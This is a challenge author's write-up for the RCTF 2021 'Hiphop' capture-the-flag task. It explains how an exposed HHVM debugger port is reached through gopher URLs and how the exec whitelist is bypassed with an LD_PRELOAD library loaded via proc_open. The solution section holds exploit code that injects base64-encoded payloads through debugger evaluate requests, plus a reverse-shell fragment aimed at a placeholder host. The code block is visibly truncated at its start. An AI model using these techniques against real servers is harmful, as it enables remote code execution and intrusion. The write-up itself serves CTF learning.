# Hiphop

## Writeup

1\. Read `file:///proc/self/cmdline` to get Hiphop command line, found
`-dhhvm.debugger.vs_debug_enable=1`.  
2\. Install Visual Studio Code & HHVM and start debugging.  
3\. Now you can execute any Hacklang in debug console, try hard to bypass
`-dhhvm.server.whitelist_exec=true`.  
4\. Capture the traffic and convert TCP stream to gopher URL.

## Tips

1\. When you debug gopher URL, you may find neither PHP 8 nor curl you
installed locally can send gopher requests to HHVM server. That's because some
versions of curl/libcurl cannot handle gopher URL with '%00'.  
2\. Hacklang's `putenv` never call syscall `putenv`, it just put the env into
its `g_context`, as is you cannot call `mail()`/`imap_mail()` with
`LD_PRELOAD`. I checked almost all functions that will call `execve` and only
`proc_open` allows me to set environment variables.  
3\. Calling `system` or `proc_open` will run `sh -c "YOUR_COMMAND"`, even if
command == `""`. So no matter what, `getuid` in `LD_PRELOAD` will always be
called.  
4\. Some syntax of Hacklang cannot be used in debugging context so just
`eval()` it.  
5\. Hacklang is very strange from PHP, its doc is bullshit. What's even more
annoys me is that even StackOverflow doesn't have a discussion about it. Good
luck to you hackers.

## Solution  
```php  
& /dev/tcp/YOURIP/YOURPORT 0>&1;;  
$ldpreload = './ldpreload/a.so';

req('{"command":"attach","arguments":{"name":"Attach","type":"hhvm","request":"attach","host":"localhost","port":8999,"remoteSiteRoot":"/","localWorkspaceRoot":"/","__configurationTarget":5,"__sessionId":"","sandboxUser":"root"},"type":"request","seq":1}'
. "\0" .
'{"command":"evaluate","arguments":{"expression":"file_put_contents(\'' .
$sandbox . '\',base64_decode(\'' .
base64_encode(file_get_contents($ldpreload)) . '\'));eval(base64_decode(\'' .
base64_encode('function aa(){$ch=1;proc_open(\'\',dict[],inout
$ch,\'\',dict[\'LD_PRELOAD\'=>\'' . $sandbox . '\',\'COMMAND\'=>\'bash -c
\\\\\'' . $command . '\\\\\'\']);}') .
'\'));aa();","context":"repl"},"type":"request","seq":2}' . "\0");  
```

## Unintended solution

No one bypassed `hhvm.server.whitelist_exec=true` in my way. All solved teams
(7 teams) used an unintended function that did not check the whitelist to
bypass it, it's better to check theirs writeup. I will update it here soon.  

Original writeup (https://github.com/zsxsoft/my-ctf-
challenges/tree/master/rctf2021/hiphop).